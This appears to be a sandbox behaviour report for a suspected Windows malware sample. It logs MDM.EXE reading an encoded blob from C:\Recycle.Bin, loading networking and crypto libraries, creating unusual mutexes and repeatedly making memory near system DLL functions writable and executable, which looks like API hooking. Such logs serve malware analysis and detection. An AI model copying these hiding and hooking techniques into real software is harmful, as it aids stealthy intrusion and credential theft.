File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2311340937
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: B30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2311345009
File opened Path: C:\WINDOWS\system32\WS2_32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2311350850
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and read Type: commit Baseaddress: B30000 Size: 20480 Protection: readonly Mapped to pid: own pid success or wait 2311355619
File opened Path: C:\WINDOWS\system32\ADVAPI32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2311359731
Section loaded Path: C:\WINDOWS\system32\advapi32.dll Access: query and read Type: commit Baseaddress: B30000 Size: 28672 Protection: readonly Mapped to pid: own pid success or wait 2311364046
File opened Path: C:\WINDOWS\system32\CRYPT32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2311368731
Section loaded Path: C:\WINDOWS\system32\crypt32.dll Access: query and read Type: commit Baseaddress: B30000 Size: 77824 Protection: readonly Mapped to pid: own pid success or wait 2311373008
Mutant created Name: \BaseNamedObjects\Global\25LSmN0q5Cx8k1GCFvMKe5z0i3US0DM object name exists 2311376540
Thread created PID: 2000 TID: 3172 EIP: 7C8106F9 Imagepath: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Injected: false success or wait 2311378246
File opened Path: \pipe\globpluginspipe Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2311381143
Thread delayed Time: 0 TID: 12882 success or wait 2312218778
Thread delayed Time: 0 TID: 12882 success or wait 2312274903
Thread delayed Time: 0 TID: 12882 success or wait 2312275404
Thread delayed Time: 0 TID: 12882 success or wait 2313968535
Thread delayed Time: 0 TID: 12882 success or wait 2313972475
Thread delayed Time: 0 TID: 12882 success or wait 2313975209
Thread delayed Time: 0 TID: 12882 success or wait 2315072456
Thread delayed Time: 0 TID: 12882 success or wait 2315077425
Thread delayed Time: 0 TID: 12882 success or wait 2315082006
Thread delayed Time: 0 TID: 12882 success or wait 2316191096
Thread delayed Time: 0 TID: 12882 success or wait 2316195725
Thread delayed Time: 0 TID: 12882 success or wait 2316200323
Thread delayed Time: 0 TID: 12882 success or wait 2317309683
Thread delayed Time: 0 TID: 12882 success or wait 2317314290
Thread delayed Time: 0 TID: 12882 success or wait 2317318874
Thread delayed Time: 0 TID: 12882 success or wait 2318429034
Thread delayed Time: 0 TID: 12882 success or wait 2318433766
Thread delayed Time: 0 TID: 12882 success or wait 2318438304
Thread delayed Time: 0 TID: 12882 success or wait 2319546904
Thread delayed Time: 0 TID: 12882 success or wait 2319551515
Thread delayed Time: 0 TID: 12882 success or wait 2319556354
Thread delayed Time: 0 TID: 12882 success or wait 2320665490
Thread delayed Time: 0 TID: 12882 success or wait 2320670006
Thread delayed Time: 0 TID: 12882 success or wait 2320674530
Thread delayed Time: 0 TID: 12882 success or wait 2321784117
Thread delayed Time: 0 TID: 12882 success or wait 2321788755
Thread delayed Time: 0 TID: 12882 success or wait 2321793264
Thread delayed Time: 0 TID: 12882 success or wait 2322902751
Thread delayed Time: 0 TID: 12882 success or wait 2322907304
Thread delayed Time: 0 TID: 12882 success or wait 2322911840
Thread delayed Time: 0 TID: 12882 success or wait 2324023241
Thread delayed Time: 0 TID: 12882 success or wait 2324028756
Thread delayed Time: 0 TID: 12882 success or wait 2324031497
Thread delayed Time: 0 TID: 12882 success or wait 2325143042
Thread delayed Time: 0 TID: 12882 success or wait 2325148292
Thread delayed Time: 0 TID: 12882 success or wait 2325151042
Thread delayed Time: 0 TID: 12882 success or wait 2326260502
Thread delayed Time: 0 TID: 12882 success or wait 2326265690
Thread delayed Time: 0 TID: 12882 success or wait 2326268451
Thread delayed Time: 0 TID: 12882 success or wait 2327377169
Thread delayed Time: 0 TID: 12882 success or wait 2327381801
Thread delayed Time: 0 TID: 12882 success or wait 2327386349
Thread delayed Time: 0 TID: 12882 success or wait 2328494961
Thread delayed Time: 0 TID: 12882 success or wait 2328496570
Thread delayed Time: 0 TID: 12882 success or wait 2328498190
Thread delayed Time: 0 TID: 12882 success or wait 2329613585
Thread delayed Time: 0 TID: 12882 success or wait 2329615243
+ Sections
+ General
Start time: 05:48:15
Start date: 01/12/2011
Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE
Commandline: C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
Imagebase: 0x400000
File size: 322120 bytes
MD5 hash: 11F714F85530A2BD134074DC30E99FCA
File Activities:
+ File opened
File Path Access Options Content overwritten Completion Count Source Address
C:\WINDOWS\system32\ntdll.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 5 BAD6A36
C:\Recycle.Bin\07A49F015E0D693 read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 2 BAF4E4E
C:\WINDOWS\system32\USER32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
C:\WINDOWS\system32\WININET.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 11 BAD6A36
C:\WINDOWS\system32\WS2_32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
C:\WINDOWS\system32\ADVAPI32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
C:\WINDOWS\system32\CRYPT32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
\pipe\globpluginspipe read attributes and synchronize and generic read synchronous io non alert and non directory file false object name not found 1 BADD812
+ File read
File Path Offset Length Value Completion Count Source Address
C:\Recycle.Bin\07A49F015E0D693 none 5934 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2 BAE818F
Section Activities:
Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
+ Section loaded by program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
\KnownDlls\CRYPT32.dll write and read and execute unknown B30000 77824 own pid readonly object name not found 1 BAE50FD
C:\WINDOWS\system32\crypt32.dll query and write and read and execute image 77A80000 610304 own pid read write success or wait 1 BAE50FD
\KnownDlls\MSASN1.dll write and read and execute unknown 77A80000 610304 own pid read write object name not found 1 BAE50FD
C:\WINDOWS\system32\msasn1.dll query and write and read and execute image 77B20000 73728 own pid read write success or wait 1 BAE50FD
\KnownDlls\WS2_32.dll write and read and execute unknown 77B20000 73728 own pid read write object name not found 1 BAE50FD
C:\WINDOWS\system32\ws2_32.dll query and write and read and execute image 71AB0000 94208 own pid read write success or wait 1 BAE50FD
\KnownDlls\WS2HELP.dll write and read and execute unknown 71AB0000 94208 own pid read write object name not found 1 BAE50FD
C:\WINDOWS\system32\ws2help.dll query and write and read and execute image 71AA0000 32768 own pid read write success or wait 1 BAE50FD
\KnownDlls\WININET.dll write and read and execute unknown 3D930000 942080 own pid read write success or wait 1 BAE50FD
\KnownDlls\Normaliz.dll write and read and execute unknown 900000 36864 own pid read write conflicting addresses 1 BAE50FD
\KnownDlls\urlmon.dll write and read and execute unknown 78130000 1257472 own pid read write success or wait 1 BAE50FD
\KnownDlls\iertutil.dll write and read and execute unknown 3DFD0000 2002944 own pid read write success or wait 1 BAE50FD
\KnownDlls\MSIMG32.dll write and read and execute unknown 3DFD0000 2002944 own pid read write object name not found 1 BAE50FD
C:\WINDOWS\system32\msimg32.dll query and write and read and execute image 76380000 20480 own pid read write success or wait 1 BAE50FD
C:\WINDOWS\system32\ntdll.dll query and read commit 930000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 930000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 930000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 930000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 930000 65536 own pid readonly success or wait 1 BAD6A8A
\KnownDlls\nspr4.dll write and read and execute unknown 930000 65536 own pid readonly object name not found 1 BAF1523
C:\WINDOWS\system32\user32.dll query and read commit 930000 57344 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 930000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 930000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 930000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 930000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 930000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 930000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 930000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 930000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 930000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 930000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 930000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ws2_32.dll query and read commit 930000 20480 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\advapi32.dll query and read commit 930000 28672 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\crypt32.dll query and read commit 930000 77824 own pid readonly success or wait 1 BAD6A8A
Mutant Activities:
+ Mutant created
Name Completion Count Source Address
\BaseNamedObjects\zXeRY3a_PtW|00000000 success or wait 1 8F06B4
\BaseNamedObjects\Global\25LSmN0q5Cx8k1GCFvMKe5z0i3US0DM object name exists 1 BAE0EF7
Thread Activities:
+ Thread created
TID PID EIP Injected Filepath Completion Count Source Address
3312 2224 7C8106F9 false C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE success or wait 1 8F0639
3268 2224 7C8106F9 false C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE success or wait 1 BAD6140
3332 2224 7C8106F9 false C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE success or wait 1 BAD6140
3368 2224 7C8106F9 false C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE success or wait 1 BAD6140
3364 2224 7C8106F9 false C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE success or wait 1 BAD6140
+ Thread delayed
TID Delay Completion Count Source Address
12904 0s success or wait 201 BAED21A
+ Thread terminated
TID PID Completion Count Source Address
3312 2224 success or wait 0 8F0279
Memory Activities:
+ Memory attributes changed
PID Filepath Base Length New Protection Old Protection Completion Count Source Address
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE 7C90CFEE 2000 page execute and read and write page execute and read and write success or wait 1 8F05EC
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE 7C90D76E 2000 page execute and read and write page execute and write copy success or wait 1 BAE95DC
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE 7C90D76E 2000 page execute and read and write page execute and read and write success or wait 1 BAF2C8B
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE BAF6E20 2000 page execute and read and write page execute and read and write success or wait 1 BAF2C8B
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE 7C90DF1E 2000 page execute and read and write page execute and read and write success or wait 2 BAE95DC
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE BB10A90 2000 page execute and read and write page execute and read and write success or wait 1 BAF2CA1
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE 7C90DC5E 2000 page execute and read and write page execute and read and write success or wait 2 BAE95DC
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE BAFF2F8 2000 page execute and read and write page execute and read and write success or wait 1 BAF2CB7
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE 7C90D2EE 2000 page execute and read and write page execute and read and write success or wait 2 BAE95DC
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE BAFCF58 2000 page execute and read and write page execute and read and write success or wait 1 BAF2CCD
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE 7C90DB3E 2000 page execute and read and write page execute and read and write success or wait 2 BAE95DC
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE BB10168 2000 page execute and read and write page execute and read and write success or wait 1 BAF2D09
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE 7E418BF6 2000 page execute and read and write page execute read success or wait 1 BAE95DC
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE 7E418BF6 2000 page execute and read and write page execute and read and write success or wait 1 BAED314
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE BAFC210 2000 page execute and read and write page execute and read and write success or wait 1 BAED314
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE 3D949088 2000 page execute and read and write page execute read success or wait 1 BAE95DC
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE 3D949088 2000 page execute and read and write page execute and read and write success or wait 1 BAF138F
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE BB10D98 2000 page execute and read and write page execute and read and write success or wait 1 BAF138F
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE 3D95EE89 2000 page execute and read and write page execute read success or wait 1 BAE95DC
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE 3D95EE89 2000 page execute and read and write page execute and read and write success or wait 1 BAF13C1
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE BB104E8 2000 page execute and read and write page execute and read and write success or wait 1 BAF13C1
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE 3D94FABE 2000 page execute and read and write page execute read success or wait 1 BAE95DC
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE 3D94FABE 2000 page execute and read and write page execute and read and write success or wait 1 BAF13F4
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE BAF65C8 2000 page execute and read and write page execute and read and write success or wait 1 BAF13F4
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE 3D9A608E 2000 page execute and read and write page execute read success or wait 1 BAE95DC
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE 3D9A608E 2000 page execute and read and write page execute and read and write success or wait 1 BAF1427
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE BAFF660 2000 page execute and read and write page execute and read and write success or wait 1 BAF1427
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE 3D94D508 2000 page execute and read and write page execute read success or wait 1 BAE95DC
+ Chronological sections
Operation Data Completion Time
Mutant created Name: \BaseNamedObjects\zXeRY3a_PtW|00000000 success or wait 2320893777
Thread created PID: 2224 TID: 3312 EIP: 7C8106F9 Imagepath: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Injected: false success or wait 2320897382
Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: 7C90CFEE Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2320898918
Section loaded Path: \KnownDlls\CRYPT32.dll Access: write and read and execute Type: unknown Baseaddress: B30000 Size: 77824 Protection: readonly Mapped to pid: own pid object name not found 2320900745
Section loaded Path: C:\WINDOWS\system32\crypt32.dll Access: query and write and read and execute Type: image Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid success or wait 2320903801
Section loaded Path: \KnownDlls\MSASN1.dll Access: write and read and execute Type: unknown Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid object name not found 2320924551
Section loaded Path: C:\WINDOWS\system32\msasn1.dll Access: query and write and read and execute Type: image Baseaddress: 77B20000 Size: 73728 Protection: read write Mapped to pid: own pid success or wait 2320926384
Section loaded Path: \KnownDlls\WS2_32.dll Access: write and read and execute Type: unknown Baseaddress: 77B20000 Size: 73728 Protection: read write Mapped to pid: own pid object name not found 2320937892
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and write and read and execute Type: image Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid success or wait 2320939465
Section loaded Path: \KnownDlls\WS2HELP.dll Access: write and read and execute Type: unknown Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid object name not found 2320951198
Section loaded Path: C:\WINDOWS\system32\ws2help.dll Access: query and write and read and execute Type: image Baseaddress: 71AA0000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2320952850
Section loaded Path: \KnownDlls\WININET.dll Access: write and read and execute Type: unknown Baseaddress: 3D930000 Size: 942080 Protection: read write Mapped to pid: own pid success or wait 2320957759
Section loaded Path: \KnownDlls\Normaliz.dll Access: write and read and execute Type: unknown Baseaddress: 900000 Size: 36864 Protection: read write Mapped to pid: own pid conflicting addresses 2320963800
Section loaded Path: \KnownDlls\urlmon.dll Access: write and read and execute Type: unknown Baseaddress: 78130000 Size: 1257472 Protection: read write Mapped to pid: own pid success or wait 2320970554
Section loaded Path: \KnownDlls\iertutil.dll Access: write and read and execute Type: unknown Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid success or wait 2320979533
Section loaded Path: \KnownDlls\MSIMG32.dll Access: write and read and execute Type: unknown Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid object name not found 2321144485
Section loaded Path: C:\WINDOWS\system32\msimg32.dll Access: query and write and read and execute Type: image Baseaddress: 76380000 Size: 20480 Protection: read write Mapped to pid: own pid success or wait 2321148077
Thread created PID: 2224 TID: 3268 EIP: 7C8106F9 Imagepath: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Injected: false success or wait 2321157056
Thread delayed Time: 0 TID: 12904 success or wait 2321158746
Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: 7C90D76E Length: 2000 New Protection: page execute and read and write New Protection: page execute and write copy success or wait 2321159324
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2321160339
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 930000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2321164897
Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: 7C90D76E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2321166687
Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: BAF6E20 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2321167041
Thread created PID: 2224 TID: 3332 EIP: 7C8106F9 Imagepath: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Injected: false success or wait 2321169064
Thread created PID: 2224 TID: 3368 EIP: 7C8106F9 Imagepath: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Injected: false success or wait 2321171766
Thread delayed Time: 0 TID: 12904 success or wait 2321174143
Thread delayed Time: 0 TID: 12904 success or wait 2321174543
Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: 7C90DF1E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2321174726
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2321175732
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 930000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2321179524
Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: 7C90DF1E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2321181867
Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: BB10A90 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2321182172
Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: 7C90DC5E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2321182481
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2321183469
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 930000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2321187226
Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: 7C90DC5E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2321189544
Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: BAFF2F8 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2321189847
Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: 7C90D2EE Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2321190154
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2321191207
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 930000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2321195044
Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: 7C90D2EE Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2321197497
Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: BAFCF58 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2321197804
Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: 7C90DB3E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2321198597
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2321199592
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 930000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2321203422
Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: 7C90DB3E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2321205756
Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: BB10168 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2321206062
Section loaded Path: \KnownDlls\nspr4.dll Access: write and read and execute Type: unknown Baseaddress: 930000 Size: 65536 Protection: readonly Mapped to pid: own pid object name not found 2321207010
File opened Path: C:\Recycle.Bin\07A49F015E0D693 Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2321209156
File read Path: C:\Recycle.Bin\07A49F015E0D693 Offset: none Length: 5934 Value: 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2321210503
Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: 7E418BF6 Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2321222787
File opened Path: C:\WINDOWS\system32\USER32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2321224309
Section loaded Path: C:\WINDOWS\system32\user32.dll Access: query and read Type: commit Baseaddress: 930000 Size: 57344 Protection: readonly Mapped to pid: own pid success or wait 2321228437
Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: 7E418BF6 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2321230911
Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: BAFC210 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2321231225
Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: 3D949088 Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2321231616
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2321232616
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 930000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2321237139
Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: 3D949088 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2321239868
Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: BB10D98 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2321240172
Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: 3D95EE89 Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2321240562
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2321241570
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 930000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2321245440
Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: 3D95EE89 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2321248233
Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: BB104E8 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2321248536
Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: 3D94FABE Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2321248927
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2321249931
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 930000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2321253793
Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: 3D94FABE Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2321256581
Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: BAF65C8 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2321256879
Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: 3D9A608E Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2321257555
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2321258550
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 930000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2321262365
